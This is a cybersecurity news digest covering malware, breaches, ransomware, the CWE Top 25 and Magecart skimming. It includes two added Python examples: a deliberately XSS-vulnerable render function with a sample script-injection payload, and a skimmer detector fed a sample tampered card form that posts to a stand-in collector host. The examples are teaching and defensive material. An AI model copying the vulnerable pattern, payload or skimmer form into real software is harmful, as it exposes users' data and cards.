Cyber Risk News
The infamous Lazarus Group is behind new malware discovered targeting ATMs and back-office systems in Indian banks and research centers, according to Kaspersky.
The Russian AV vendor claimed in a new report that it discovered the ATMDtrack malware back in late summer 2018. It is designed to sit on targeted ATMs and effectively skim the details of cards as they are inserted into the machine.
However, digging a little deeper, the researchers found another 180+ new malware samples similar to ATMDtrack but which were not designed to target ATMs.
Collectively, these Dtrack malware tools seem to be focused on information theft and eavesdropping, via functionality such as: keylogging; retrieving browser history; gathering host IP addresses and network info; and listing all running processes and files.
The dropper also contained a remote access trojan (RAT) to give attackers complete control over a victim’s machine.
Kaspersky claimed the Dtrack malware shares similarities with the DarkSeoul campaign of 2013, also linked to North Korea’s Lazarus Group, which disrupted computers at a South Korean bank and three TV stations, as well as countless ATMs.
“We first saw early samples of this malware family in 2013, when it hit Seoul. Now, six years later, we see them in India, attacking financial institutions and research centers,” noted the report. “And once again, we see that this group uses similar tools to perform both financially motivated and pure espionage attacks.”
However, Dtrack attackers would need to take advantage of weak network security policies, weak password policies, and a lack of traffic monitoring. So by addressing these issues and putting in place reputable AV featuring behavior-based tools, as well as regular security training and IT audits, organizations could repel the threat, said Kaspersky.
“The vast amount of Dtrack samples we found demonstrate how Lazarus is one of the most active APT groups, constantly developing and evolving threats in a bid to affect large-scale industries. Their successful execution of Dtrack RAT proves that even when a threat seems to disappear, it can be resurrected in a different guise to attack new targets,” said Kaspersky security researcher, Konstantin Zykov.
“Even if you are a research center, or a financial organization that operates solely in the commercial sector with no government affiliates, you should still consider the possibility of being attacked by a sophisticated threat actor in your threat model and prepare respectively.”
A budget Asian airline group has revealed that two former employees of a third-party provider were responsible for a massive breach exposing around 35 million records.
The records — which contained names, dates of birth, phone numbers, emails, addresses, passport numbers and expiration dates — were spotted circulating on the dark web last month, although the breach only came to light last week.
They belonged to passengers of Malaysia’s Malindo Air and Thai Lion Air, which operate under parent group Lion Air.
Initial reports suggested a misconfigured Amazon Web Services (AWS) S3 bucket may have been to blame for the security incident, but AWS has since confirmed that its “services and infrastructure worked as designed and were not compromised in any way.”
Malindo Air yesterday clarified that two former workers at its e-commerce provider GoQuo in a development center in India “improperly accessed and stole the personal data of our customers.”
“Malindo Air has been working closely with all the relevant agencies including the Malaysian Personal Data Protection Commissioners and the National Cyber Security Agency (NACSA) as well as their counterparts overseas,” it added in a statement.
“Malindo Air wishes to reiterate that this incident is not related to the security of its data architecture or that of its cloud provider Amazon Web Services. All its systems are fully secured and none of the payment details of customers were compromised due to the malicious act.”
Robert Ramsden-Board, VP EMEA at Securonix, argued that detecting malicious insider behavior in the supply chain is extremely difficult.
“Organizations need to assess their suppliers’ cybersecurity, ensuring that they have appropriate measures in place to detect unauthorized activity by external and internal actors,” he added.
“They also need to properly vet all third-party suppliers before onboarding and establish boundaries on what a supplier can access with immediate alerts on any attempts to access or download off-limits or customer data.”
Healthcare in Wyoming has been seriously disrupted after a ransomware attack brought down the computer systems of Campbell County Health.
Campbell County Health (CCH), which is based in Gillette, includes Campbell County Memorial Hospital, a 90-bed acute-care community hospital; Campbell County Medical Group, with nearly 20 clinics; The Legacy Living & Rehabilitation Center long-term care center; and the Powder River Surgery Center.
All of CCH's 1500 computers and its email server were affected by the attack, which took place on Friday morning, September 20. As a result, surgeries have been canceled, and new inpatient admissions have ceased.
All of today's appointments in the cancer center's radiation oncology department were canceled, and no outpatient lab, respiratory therapy, blood draws, or radiology exams or procedures are being carried out.
The attack prompted the hospital to go "on full divert," meaning patients arriving at the emergency room or walk-in clinic are triaged then transferred to an alternative care facility, if needed.
Other hospitals in the region have been informed of the situation and are working with CCH to provide urgent care, although two of them, Casper and Rapid City, were already full when news of the attack broke.
A press release issued by CCH on Friday afternoon stated: "Campbell County Health has been the victim of a ransomware attack. All CCH computer systems have been affected, which impacts the organization’s ability to provide patient care.
"The appropriate authorities have been notified, and efforts are underway to restore the affected systems. Information on CCH services will be updated as soon as information becomes available."
CCH said that the attack had not compromised any patient data.
A CCH spokesperson said on Friday: "At this point in time, there is no evidence that any patient data has been accessed or misused. The investigation is ongoing, and we will provide updates when more information becomes available. We are working diligently to restore complete access to our services."
As of Sunday, Campbell County Memorial Health's maternal child department had begun accepting patients again on a case-by-case basis. It is not yet clear when CCH services will be back to normal.
A CCH spokesperson said: "We are collaborating with the local, state, and federal authorities to address this unfortunate incident securely and as quickly as we can. We are very thankful for the local support from the City of Gillette, Campbell County Commissioners, [and] Campbell County Emergency Management."
The role of chief information security officer (CISO) is being treated with newfound respect, according to research by a security solutions integrator.
The results, published today, show that 96% of respondents think that senior executives have a better understanding of cybersecurity than they did five years ago, and 67% said the business they worked for prioritized cybersecurity above all other business considerations.
Interestingly, 58% of CISOs reported that their job prospects had improved after they experienced a data breach. In fact, most respondents thought that the career path of a CISO was today more illustrious than ever.
Of the CISOs surveyed, 76% felt that cybersecurity risk was now so important to businesses that CISOs would start being promoted to the role of CEO. Not bad for a relatively new role in the corporate executive hierarchy.
"The Chief Information Security Officer has traditionally reported to the CIO because the job has been regarded as primarily technical. However, the current epidemic of breaches coupled with privacy regulations like the GDPR and CCPA has made cybersecurity a tier-1 business risk," wrote researchers for Optiv.
According to Optiv’s practice director of risk management & transformation, Mark Adams, CISOs have many qualities that would make them great in the role of CEO. He said: "The CISO exhibits a mastery of negotiation by actively listening and applying the disciplines of consensus-building among his peers and subordinates. The effective CISO thinks more strategically than tactically, planning for the long term and what organizational conditions must be managed to achieve success."
But before CISOs ascend the ranks they have some serious work to do, especially in the US, which the research shows lags behind the UK when it comes to practicing what to do in the event of a cyber-attack.
Adams said: "UK-based organizations report a significantly higher frequency of rehearsing their incident response plans. It is a bit surprising that 36% of US-based companies reported exercising their plans less than once per year, particularly given the adverse impact that perceived negligence can have on the brand/reputation of the organization."
New research has shown that cybercrime really does pay, but not for the people you'd expect.
A study conducted by a company review site to find out which firms are the most generous when it comes to remuneration found that the best-paying gig was to be had at an American multinational cybersecurity company.
Glassdoor's list of the 25 highest-paying companies in the US for 2019 was topped by Palo Alto Networks, which has its headquarters in Santa Clara, California. The cybersecurity firm, which employs over 5,000 people around the world, rewards workers for their efforts with a median total salary of $170,929. This figure dwarfs the Bay Area's average median base pay, which is $73,128.
After reporting a 29% year-over-year increase in revenue for the 2018 fiscal year, in which they made $2.3bn, Palo Alto Networks certainly has the cash to splash. Such bountiful paychecks are likely to have been a contributing factor when Palo Alto Networks was ranked number one as "best place to work" in the Bay Area by SF Business Times in 2016.
"Not surprisingly, tech companies dominate the list of high-paying employers, including companies like Twitter, Google, and LinkedIn," Glassdoor's researchers wrote. "The three highest-paying employers in 2019 were all tech companies paying a median total salary over $160,000 a year."
In fact, every one of the top ten highest-paying companies was tech related. Second after Palo Alto Networks was NVIDIA, which has more than 50 offices worldwide and is also based in Santa Clara. The median total salary NVIDIA pays employees is $170,068.
The list of highest-paying companies was drawn from data reported to Glassdoor between July 1, 2018, and June 30, 2019, by employees based in the US. The information reported included details on base pay and other forms of compensation, including commissions, tips, and bonuses. To be considered for the report, companies had to have received at least 75 salary reports during this timeframe.
Though tech companies are leading the way on median pay, researchers found that the highest-paid jobs are in the field of medicine. Physicians topped Glassdoor's list of the 25 highest-paying roles in the US for 2019, earning a median base salary of $193,415.
However, Steve Durbin, managing director of the Information Security Forum, a London-based authority on cyber, information security, and risk management, thinks that doctors may lose their spot at the top to a future gatekeeper of cybersecurity.
Durbin said: "Our digital world today runs on shared data and networks, and it relies on the public trust. Security professionals are the protectors of these assets. Moving forward, organizations should rise above the hiring fray and focus on fresh, strategic, long-term approaches to building, supporting, and integrating the security workforce.
"Security professionals are key to the future and their skill sets may very well push their profession to the top of the salary list."
Twitter has removed another 10,000 accounts across six countries after discovering coordinated activity among nation states designed to spread misinformation.
The move comes nearly a year after the social network first began efforts at uncovering state-sponsored propaganda efforts using fake accounts. Since then, it has announced new discoveries in January, June and August this year.
Chinese efforts to spread misinformation about Hong Kong’s pro-democracy protesters appear to be showing no signs of slowing down. On top of the network of 200,000 fake accounts disclosed in August, Twitter has added another 4,301 which it said were attempting to “sow discord” about the protests.
Elsewhere, 4248 accounts were suspended in the UAE for “often employing false personae and tweeting about regional issues, such as the Yemeni Civil War and the Houthi Movement.”
A further network of 271 accounts in Egypt and the UAE were focused on spreading misinformation about Qatar and other countries such as Iran.
Twitter also suspended 1019 fake accounts in Ecuador linked to the PAIS Alliance party for a propaganda operation supporting President Moreno’s administration.
A further 259 accounts were suspended in Spain, once again linked to a major political party – this time the right-wing Partido Popular.
As per previous culls, Twitter has permanently suspended the flagged accounts and made available an archive of removed tweets for researchers to study.
“Nearly one year on, the archive is now the largest of its kind in the industry. Thousands of researchers have made use of these data sets that contain millions of individual Tweets and more than one terabyte of media. Using our archive, these researchers have conducted their own investigations and shared their insights and independent analyses with the world,” the firm explained.
“Transparency and openness are deep-seated values at the heart of Twitter which define and guide our methodology around these disclosures. Going forward, we will continue to enhance and refine our approach to disclosing state-affiliated information operations on our service.”
Online education platform Thinkful has suffered a data breach which may have given hackers access to users' accounts.
The training site for developers notified all of its users by email that an unspecified number may have had their “company credentials” accessed by an unauthorized third party.
However, it clarified that no government identification or financial info belonging to the company would have been available to the hackers via this route. “As soon as we discovered this unauthorized access we promptly changed the credentials, took additional steps to enhance the security measures we have in place, and initiated a full investigation,” it continued.
“Additionally, at this time we have no evidence of any unauthorized access to any other Thinkful user account data or user information. However, as a measure of added precaution, we are requiring all users to reset their Thinkful passwords.”
The cause of the breach is still unclear, although a phishing attack against a site admin or a credential stuffing raid are among the usual suspects. Also unclear is the number of users affected and when the incident occurred.
It does come at an awkward time for Thinkful, however, given the firm only recently announced its $80m acquisition by student learning platform provider Chegg.
That firm has also been on the receiving end of unwanted attention from the black hat community: last year it revealed in a regulatory filing that hackers managed to access a company database, stealing log-ins, and email and shipping addresses.
It was forced to reset 40 million passwords as a result.
Securonix VP EMEA, Robert Ramsden-Board, argued that the incident highlights the importance of due diligence before buying a company.
“Purchasing a company that has taken a lax approach to security will only come back to haunt the buyer, as Marriott learned the hard way after its purchase of Starwood hotels,” he added.
“Data breaches pose a serious reputational and business risk to organizations. Therefore, to avoid unauthorized access to internal systems organizations should simulate data breach security drills to identify weaknesses that could be exploited and train staff on the malicious tactics cyber-criminals use to reduce the risk of human error.”
Facebook has removed tens of thousands of apps from hundreds of developers as the fallout from the Cambridge Analytica scandal continues.
In March last year it was revealed that the shadowy political consultancy got hold of the personal details of over 50 million users of a Facebook app after its developers broke the social network’s rules on data collection.
As part of its $5bn settlement with the FTC, Facebook promised greater oversight of its developer ecosystem to ensure a repeat incident could not occur.
According to Facebook VP of product partnerships, Ime Archibong, the tens of thousands of suspended apps are linked to around 400 developers.
“We initially identified apps for investigation based on how many users they had and how much data they could access. Now, we also identify apps based on signals associated with an app’s potential to abuse our policies,” he explained.
“Where we have concerns, we conduct a more intensive examination. This includes a background investigation of the developer and a technical analysis of the app’s activity on the platform. Depending on the results, a range of actions could be taken from requiring developers to submit to in-depth questioning, to conducting inspections or banning an app from the platform.”
Although many of the suspended apps were still in their test phase and did not pose an immediate threat to user privacy, they were still suspended if they didn’t meet Facebook rules and/or if the developer failed to respond to a request for further information.
Some were banned outright if they inappropriately shared Facebook data, made it publicly available without protecting users’ identities, or otherwise violated policies.
These include myPersonality, whose developers stored psychology profiles for millions of users on a poorly secured site for years. Archibong also revealed that Facebook is suing South Korean data analytics firm Rankwave, as well as LionMobi and JedMobi, which are apps linked to malware distribution.
Aside from the ongoing App Developer Investigation, Facebook claims to have made improvements to its developer oversight, including removing APIs, enhancing its number of investigators, and introducing new rules to restrict developers’ control over user data.
In a new project announced by IBM Security on September 17, the American multi-national IT company will provide technologies and data that will give Los Angeles' commercial movers and shakers an edge in the event of a cyber-attack.
As part of the project, business owners will be able to access two new free tools made available by the LA Cyber Lab, a non-profit providing threat intelligence to local businesses.
The first tool is a mobile application that any citizen can use to submit and analyze suspicious emails to determine their risk and if they are phishing attacks. The second tool, and the real centerpiece of this collaborative effort, is the cloud-based Threat Intelligence Sharing Platform (TISP), developed in collaboration with TruSTAR.
Functioning as a kind of digital neighborhood watch, TISP will allow users to circulate their spear-phishing concerns and educate themselves on the latest business email compromise (BEC) or ransomware campaigns.
A neat feature of the platform is that it reviews suspicious emails submitted by users, extracting key information and searching over 25 common and unique data sources, to indicate the level of risk posed. It can also correlate key information in the email to the associated threat group and their latest attack campaign.
"Public safety in the 21st century isn't just about protecting our physical streets and neighborhoods—we need to protect the digital presence that is part of everyday life for our residents and businesses," said Los Angeles' mayor, Eric Garcetti.
"The Threat Intelligence Sharing Platform and mobile app will advance the LA Cyber Lab's work that has made our city a national cybersecurity model, all while better defending Angelenos from cyber-threats."
In a bid to help other cities in the US know what to do in the event of a cyber-attack, IBM is hosting three complimentary training sessions for municipalities in the IBM X-Force Command Cyber Range in Cambridge, Massachusetts.
At each of the sessions, which will take place on October 22, November 19, and December 10, 2019, attendees will experience a simulated attack in order to practice their response.
The attack may be simulated, but the threat is very real. In this year alone, more than 70 American cities have become the victims of ransomware.
Kevin Albano, associate partner, IBM Security Services, IBM Security, said: "While a collaboration like this takes time and the right partners, the process itself was refreshing as a result of the city’s eagerness and dedication to improving cybersecurity for the area. The development of the LA Cyber Lab two years ago was the first real push in the right direction, and the development of these solutions is only continuing that goal and leading the charge for other cities to become more prepared."
A lack of security on WeWork's WiFi network has left sensitive user data exposed.
In August, Fast Company revealed that WeWork had used the same WiFi password at many of its rentable shared co-working spaces for years, a password that appears in plain text on WeWork's app.
The security of the real estate company's WiFi came under further criticism yesterday when CNET reported that the network's poor security had left sensitive data of WeWork users exposed.
Evidence of the exposure was provided by Teemu Airamo, who has been routinely running security scans on WeWork's WiFi network since May 2015. Airamo's scans, which were reviewed by CNET, show nearly 700 devices, including servers, computers, and connected appliances, leaking bank account credentials, email addresses, ID scans, and client databases, among other data.
Airamo said that multiple attempts made by him to alert WeWork's upper management to the security problem were met with indifference.
WeWork has around 527,000 members renting its 833 spaces in 125 cities around the world. The company filed for an initial public offering (IPO) in 2018. However, earlier this week the IPO was postponed until the end of the year after the company's reported valuation fell from $47 billion to under $20 billion.
A spokesperson for WeWork said: "WeWork takes the security and privacy of our members seriously, and we are committed to protecting our members from digital and physical threats. In addition to our standard WeWork network, we offer members the option to elect various enhanced security features, such as a private VLAN, a private SSID, or a dedicated end-to-end physical network stack.
"We are in a quiet period and can't comment beyond this statement."
Commenting on this report, Craig Young, computer security researcher for Tripwire’s Vulnerability and Exposure Research Team, said: "For the most part, as people connect to networks with shared passphrases, they are opening their devices up to be tricked onto a rogue wireless network where the attacker can connect to exposed file sharing services and tamper with connections to load fake websites.
"My recommendation for concerned WeWork customers is to set up a VPN for their own private use."
The US Air Force is requesting quotes from vendors that can provide support for a cybersecurity project under a contract worth up to $95m.
Vendors of any size are being sought to support an experimental cybersecurity platform development team that is part of the Air Force's LevelUP program.
The team's engineers are looking for vendors that can give them access to a secure DevOps platform in which they can build and test new products. Testing will be conducted at every security level and classification on private, public, and hybrid clouds.
Bidding vendors will need to prove that their company can process data securely at the second-highest security level for Defense Department systems, impact level five.
To provide the development team with the support it requires, vendors will have to access classified information, something they cannot do from their local cafe over a cappuccino. Vendors will only be considered for this valuable contract if they have access to a facility with a secret level of security clearance that they can use when they need to handle classified data.
A Blanket Purchase Agreement (BPA) for up to 15 cloud vendors is being drawn up by the Air Force Life Cycle Management Center, with a performance period of up to five years. To be eligible to receive a BPA, companies must be based in the United States with no foreign ownership or control.
Bidders have until 12:00 PM CST on October 16, 2019, to submit a quote via email. Two Ask Me Anything (AMA) sessions are planned for September 25 and October 3; however, times and locations are yet to be announced.
The LevelUP program, which is based at the Command, Control, Communications, Intelligence, and Networks Directorate Joint Base in San Antonio, Texas, was founded with the strategy to create two main products.
One product, Unified Platform, is a tool that aggregates cybersecurity incident data in a single platform that is visible not just across the Air Force, but to other military branches too. The other is LevelUP Cyber Works, a “cyber factory” in which to develop and field new capabilities at the speed and scale required in today’s cyberspace operations environment.
In a surprise U-turn, Senate Republicans have decided to back Democrat calls for an extra $250m to enhance the security of the nation’s voting infrastructure.
Speaking on the floor yesterday, Senate majority leader Mitch McConnell said: “I’m proud the Financial Services & General Government bill will include a bipartisan amendment providing another $250 million for the administration and security of their elections, to help states improve their defenses and shore up their voting systems.”
Republicans have twice blocked attempts to bring legislation to the floor designed to improve election security, in 2018 and then again in July this year. Both times they claimed that states had still not spent the $380m they were given in 2018.
“This morning, after months and months and months of Republican resistance, and months of insistent Democratic pressure, Senate Republicans have finally agreed to support our Democratic request for additional election security funding in advance of the 2020 elections,” responded Senate minority leader, Chuck Schumer.
“A year ago, our Republican friends unfortunately and short-sightedly rejected this amendment. Well, maybe, just maybe, they are starting to come around to our view that election security is necessary; that if Americans don’t believe their elections are on the up-and-up, woe is us as a country and as a democracy.”
However, even this sum may not be enough to provide the safeguards needed to improve resilience against possible Russian intrusions.
Marian Schneider, president of election transparency non-profit VerifiedVoting, argued that more is needed to help states shore up their security ahead of the 2020 Presidential election.
“This amount falls short of the $600m that passed in the House, which is much closer to meeting the need for proper investment in election security. Congress has the obligation to protect the country from threats to national security and has the opportunity to act on this nonpartisan issue — after all, everyone votes on the same equipment,” she added.
“By making federal funds available, states will be able to replace aging, insecure voting equipment and implement modern security best practices, which include using voter-marked paper ballots and robust post-election audits. Despite the progress shown today, Congress still needs to vote on bipartisan, comprehensive election security legislation to protect and ensure trustworthy elections backed by adequate funds for state and local governments to implement such measures.”
A Senate report from July warned that Russian hackers had likely compromised voting infrastructure in all 50 states ahead of the 2016 election.
Nearly 80% of global organizations now rank cyber-risk as a top-five business concern, but just 11% are highly confident they can assess, prevent and respond effectively to attacks, according to new research from Marsh and Microsoft.
The insurer has teamed up with the computing giant once again to poll 1500 global organizations for its 2019 Global Cyber Risk Perception Survey.
It found those ranking cyber-risk as a top-five concern had risen from 62% in 2017 to 80% this year, while those confident in being able to deal with a threat fell from 19% to 11% over the period.
Ownership of and engagement with cyber-risk management seems to be a key challenge for many.
Although 65% of respondents identified a senior executive or the board as the main owner of this function, only 17% of executives and board members said they’d spent more than a few days in the past year focusing on the issue. Some 51% spent several hours or less.
Similarly, 88% of organizations identified their IT/IT security teams as primary owners of cyber-risk management, but nearly a third (30%) of IT respondents said they spent just a few days or less over the past year focusing on this.
At the same time, adoption of new technologies continues apace, often without adequate safeguards.
Half of respondents said cyber-risk is almost never a barrier to the adoption of new tech, and although three-quarters (74%) evaluate risks prior to adoption, just 5% said they do so throughout the technology lifecycle. A significant minority (11%) do not perform any evaluation.
The report also revealed that organizations were likely to hold their own cyber-risk management actions to a higher standard than that of their suppliers.
That’s despite the fact that 39% said the risk posed by their partners was high or somewhat high versus just 16% who admitted their own organization poses high risk to their supply chain.
“We are well into the age of cyber-risk awareness, yet too many organizations still struggle with creating a strong cybersecurity culture with appropriate levels for governance, prioritization, management focus, and ownership,” said Kevin Richards, global head of cyber-risk consulting at Marsh.
“This places them at a disadvantage both in building cyber-resilience and in confronting the increasingly complex cyber-landscape.”
Two individuals have been indicted as part of a crackdown on a $10m tech support scam operation.
Romana Leyva and Ariful Haque have now been charged with one count of wire fraud and one count of conspiracy to commit wire fraud, which could land them with a maximum 40 years each behind bars, according to an unsealed indictment.
It alleges that the fraud ring operated a classic tech support scam campaign targeting mainly elderly computer users.
After seeing pop-ups appear on their screens warning of a serious virus infection, they were urged to call a tech support number. Often these windows were branded with legitimate corporate logos to enhance legitimacy.
Doing so would take them through to an Indian call center, where operatives would use remote access tools to investigate the ‘problem’ before charging a fee — one-time, one-year or lifetime — to the victim and installing free anti-virus on their machine.
Around 7500 North American victims were scammed in this way, losing hundreds or thousands of dollars each.
In some cases, the fraudsters came back for more, claiming the original company that promised to provide tech support was going out of business and they wanted to refund the victim.
During this 'refund' process, they claimed to have reimbursed the victim too much money by accidentally adding an extra zero onto the amount. They then demanded that the victim reimburse them to the tune of thousands of dollars via gift cards, according to the indictment.
Nevada resident Leyva and New York-based Haque are accused of creating multiple fake companies to receive the fraudulently obtained funds, and of recruiting others to do so.
The scheme is said to have lasted from at least March 2015 to December 2018.
A report from Microsoft last year revealed that 63% of consumers globally experienced a tech support scam, down slightly from 68% in 2016.
Eight years ago, a list of the world's most dangerous software errors was published by the problem-solving nonprofit MITRE Corporation. Yesterday saw the long-awaited release of an updated version of this rag-tag grouping of cyber-crime's most wanted.
The Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Errors list (CWE Top 25) is a roundup of the most widespread and critical weaknesses that can lead to serious vulnerabilities in software.
What makes these bad boys so lethal is that they are often easy to find and exploit. And once attackers have gotten their grappling hooks into the errors, they are frequently able to completely take over execution of software, steal data, or prevent the software from working.
Each error was given a threat score to communicate its level of prevalence and the danger it presents. Topping the table of treachery with a threat score of 75.56 and leading by a huge margin is "improper restriction of operations within the bounds of a memory buffer."
The second-most lethal error was determined to be "improper neutralization of input during web page generation," also known as cross-site scripting, which had a threat score of 45.69.
In 2011, a subjective approach based on interviews and surveys of industry experts was used to create the list. In 2019, the list's compilers took a data-driven approach, leveraging National Vulnerability Database (NVD) data from the years 2017 and 2018, which consisted of approximately 25,000 CVEs.
MITRE's goal is to release an updated list each year based on data from that specific year. Asked why the gap between the first two lists was so long, a MITRE spokesperson answered: "Based on the previous methodology employed for the 2011 CWE Top 25 List, it was clear that there was no basis upon which to credibly change the list.
"As new methodologies were explored, and upon selection of the current data-driven approach, it became valuable to produce a new list because it would validate whether or not the new data-driven methodology would result in a different list. And, since it did result in a different list, community stakeholders now have a new list to consume that is evidence-based and different from the 2011 list."
The lists are indeed different, but both include some of the same offenders. Explaining why, the spokesperson said: "Significant work remains in the community to educate developers, improve analysis tools, and for consumers of software products to understand that weaknesses exist, and that they have the ultimate leverage with respect to evaluating products and selecting those products that deliberately work weaknesses out.
"Effective security can exist only if a broad number of stakeholders demand that it does. The 2019 CWE Top 25 List is a tool that different stakeholders can use to understand what the most prevalent weaknesses are and how to orient themselves toward defending against them."
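The second-ranked weakness above, improper neutralization of input during web page generation (cross-site scripting), is the one that is easiest to show in a few lines. The following is an added example, not code from MITRE or from this article: a render function that concatenates untrusted input straight into markup, beside a hardened version that encodes the input for the HTML context first. The query string and page layout are constructed for illustration.

```python
"""Added example: CWE-79 (cross-site scripting) as a vulnerable render
function beside its hardened form. Not MITRE's or the article's code;
the page layout and sample query are assumptions for illustration."""
import html

# Constructed sample input: a search query a user might submit. It carries a
# script tag for the element-body context and an attribute breakout for the
# value="..." context, since both are places the value is written to the page.
UNTRUSTED_QUERY = '<script>alert(1)</script>" onmouseover="alert(2)'


def render_results_unsafe(query: str) -> str:
    """Vulnerable: untrusted input is concatenated directly into markup, so
    the browser parses the attacker's text as HTML and as an attribute."""
    return ('<h1>Results for ' + query + '</h1>'
            '<input type="text" value="' + query + '">')


def render_results_safe(query: str) -> str:
    """Hardened: encode for the HTML context before output. quote=True also
    encodes the double and single quote characters, which is what keeps the
    value inside the attribute it was written into."""
    safe = html.escape(query, quote=True)
    return ('<h1>Results for ' + safe + '</h1>'
            '<input type="text" value="' + safe + '">')


if __name__ == "__main__":
    print(render_results_unsafe(UNTRUSTED_QUERY))
    print(render_results_safe(UNTRUSTED_QUERY))
```

The encoding must match the context the value lands in: `html.escape` covers element bodies and quoted attributes, but a value written into a `<script>` block, a URL, or CSS needs a different encoder, which is why template engines that auto-escape per context are the usual mitigation rather than hand-placed calls.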
People using mobile apps to book hotel rooms for their vacations have been targeted by a skimming attack.
Research by cybersecurity company Trend Micro discovered that a series of incidents took place earlier this month in which the booking websites of two well-known hotel chains were hit by credit card–skimming malware known as Magecart.
Both websites affected were developed by Spanish company Roomleader. One of the impacted brands has 73 hotels in 14 countries and is comparable in size and geographical distribution to Exe Hotels. The other undisclosed chain has 107 hotels in 14 countries and is comparable in size and geographical distribution to Eurostars Hotels. Exe and Eurostars both have websites powered by Roomleader.
Attackers were able to pilfer data by replacing the original credit card form on the booking page of each website with a fake one, then stealing the data entered into the imposter form by the user. In this case, the thieves made off with users' names, email addresses, telephone numbers, credit card details, and hotel room preferences.
The researchers theorized that the reason why the attackers went to the trouble of creating a fake form may have been that the original form didn't ask users to fill in their credit card's card verification number, known as a CSC, CVV, or CV2.
To make the switch appear more legitimate, the digital bandits even prepared credit card forms in the eight different languages supported by the targeted hotel websites.
Trend Micro's findings follow the discovery of another Magecart-using group by the company back in May of this year. That group, known as Mirrorthief, compromised an e-commerce service provider used by American and Canadian universities.
Roger Grimes, data-driven defense evangelist at KnowBe4, commented: "There are companies and services, which any website or service can buy, that will not only monitor what is going on within any particular website, but proactively look for signs of maliciousness and notify website owners when something is amiss. Website and service owners don’t have to be surprised by things like this. They can proactively fight it. They just have to care enough to put the right controls in place."
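The monitoring Grimes describes can be as simple as fetching the booking page on a schedule and comparing what it serves against a known-good baseline. The following is an added example, not Trend Micro's, Roomleader's or any monitoring vendor's code: it parses the served HTML, records each form's action and input names plus every external script host, and flags the three signs of the swap described above, namely a form that now posts off-site, newly added card fields such as the CSC that the original form never asked for, and a script loaded from a host not on the allowlist. The hostnames, field names and both HTML documents are constructed for illustration.

```python
"""Added example: baseline integrity check for a payment form.
Not from the article or any vendor; hosts, fields and HTML are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "booking.example-hotel.test"  # assumed first-party host


class FormScanner(HTMLParser):
    """Collects each form's action and input names, and external script hosts."""

    def __init__(self):
        super().__init__()
        self.forms = []            # list of {"action": str, "fields": set}
        self.script_hosts = set()  # hostnames that scripts are loaded from
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": set()}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None and a.get("name"):
            self._current["fields"].add(a["name"].lower())
        elif tag == "script" and a.get("src"):
            # A relative src is served by the site itself.
            self.script_hosts.add(urlparse(a["src"]).hostname or SITE_HOST)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan(html_text):
    parser = FormScanner()
    parser.feed(html_text)
    return parser


def audit_page(html_text, baseline_fields, allowed_script_hosts):
    """Return a list of findings; an empty list means the page matches the baseline."""
    findings = []
    page = scan(html_text)
    for form in page.forms:
        host = urlparse(form["action"]).hostname
        if host and host != SITE_HOST:
            findings.append(f"form posts off-site to {host}")
        extra = form["fields"] - baseline_fields
        if extra:
            findings.append("unexpected payment fields: " + ", ".join(sorted(extra)))
    for host in sorted(page.script_hosts - allowed_script_hosts):
        findings.append(f"unapproved script host {host}")
    return findings


# Constructed baseline: the legitimate form, which never asked for the CSC.
BASELINE_FIELDS = {"name", "email", "phone", "card_number", "expiry"}
ALLOWED_SCRIPT_HOSTS = {SITE_HOST}

BASELINE_HTML = """
<html><body>
<script src="/js/booking.js"></script>
<form action="/book" method="post">
  <input name="name"><input name="email"><input name="phone">
  <input name="card_number"><input name="expiry">
</form></body></html>"""

# Constructed tampered page: the form was swapped for one that posts to a
# third-party collector, asks for the CSC, and pulls in an extra script.
TAMPERED_HTML = """
<html><body>
<script src="/js/booking.js"></script>
<script src="https://static.example-third-party.test/s.js"></script>
<form action="https://collector.example.test/submit" method="post">
  <input name="name"><input name="email"><input name="phone">
  <input name="card_number"><input name="expiry"><input name="cvv">
</form></body></html>"""


if __name__ == "__main__":
    print(audit_page(BASELINE_HTML, BASELINE_FIELDS, ALLOWED_SCRIPT_HOSTS))
    print(audit_page(TAMPERED_HTML, BASELINE_FIELDS, ALLOWED_SCRIPT_HOSTS))
```

The check runs against the HTML as served, so a skimmer that rewrites the form only after the page loads in the browser would need the same comparison made on the rendered DOM (for instance from a headless browser); the field and host comparison is the same either way.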
Purchasing cyber insurance to protect your business from the ever-increasing number of threats will cost you more in Delaware than in any other US state.
A new study by business insurer AdvisorSmith has found that the average cost of annual cyber insurance in the Blue Hen State is 8.34% higher than the national average and a staggering 32.49% higher than its cost in the cheapest state for cyber insurance, Arizona.
Across America's 50 states and the District of Columbia, the cost of cyber insurance averaged out at $1,501 per year, or around $125 a month, but for Delaware business owners the price rose to $1,626.92 per year. In Arizona, where the cost of cyber insurance was 24.15% cheaper than the national average, policies were on average $1,139 per year.
The study was conducted using quote estimates gathered in August and September 2019, as well as rate filings supplied by over 50 insurance companies throughout America between January 2019 and September 2019.
Premiums nationwide ranged from as low as $544 to as high as $2,642 for comparable insurance coverage, based upon companies with moderate risks. The premiums were based upon liability limits of $1m, with a $10,000 deductible and $1m in company revenue.
North Carolina was the second most expensive state for cyber insurance, with an average annual cost of $1,611. At the other end of the scale, after Arizona, Michigan and Minnesota offered the cheapest cyber insurance.
Asked how the average cost of cyber insurance has changed since last year, AdvisorSmith's Adrian Mak said: "Premium increases in the cyber market are tracking at 5% or less, which is relatively stable for an insurance product."
The Marsh-Microsoft 2019 Global Cyber Risk Perception survey published yesterday found that only 17% of executives said they had spent more than a few days on cyber-risk over the past year. However, a little investment of time in their company's cybersecurity could save them money.
Mak said: "We are seeing insurance companies focus more on operational cybersecurity defenses, where they are raising premiums on companies that don’t address cybersecurity vulnerabilities, while charging less to companies that are following the latest cybersecurity best practices."
Describing how he expects the cyber insurance landscape to change going forward, Mak said: "The cyber insurance marketplace is expected to experience continued growth over the next decade. We expect more growth in the small and midsize business sector. Especially in small business policies, we are seeing cyber insurance bundled into package policies."
Facebook has taken down hundreds of Facebook and Instagram Pages and accounts after two separate coordinated campaigns were discovered attempting to influence user behavior in Iraq and Ukraine.
It’s possible that the fake news operations were an attempt to peddle misinformation ahead of elections in the Middle East nation last year and in the eastern European country a few months ago.
